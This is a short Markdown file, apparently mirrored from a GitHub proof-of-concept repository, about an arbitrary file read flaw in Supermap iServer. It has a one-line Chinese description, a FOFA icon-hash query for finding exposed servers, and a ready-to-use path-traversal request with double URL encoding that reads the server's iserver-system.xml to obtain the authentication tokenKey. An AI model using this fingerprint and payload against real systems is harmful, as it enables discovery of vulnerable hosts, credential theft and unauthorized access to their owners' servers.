mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
13 lines
369 B
Markdown
13 lines
369 B
Markdown
## Supermap iServer任意文件读取漏洞
|
||
|
||
## 漏洞描述
|
||
北京超图软件股份有限公司是聚焦地理信息软件和空间智能领域的基础软件与应用软件厂商,Supermap iServer 存在文件读取漏洞,攻击者可获取用于认证的tokenKey
|
||
## fofa
|
||
|
||
icon_hash="-1656662001"
|
||
|
||
## poc
|
||
```
|
||
/iserver/output/../WEB-IN%2546/iserver-system.xml
|
||
```
|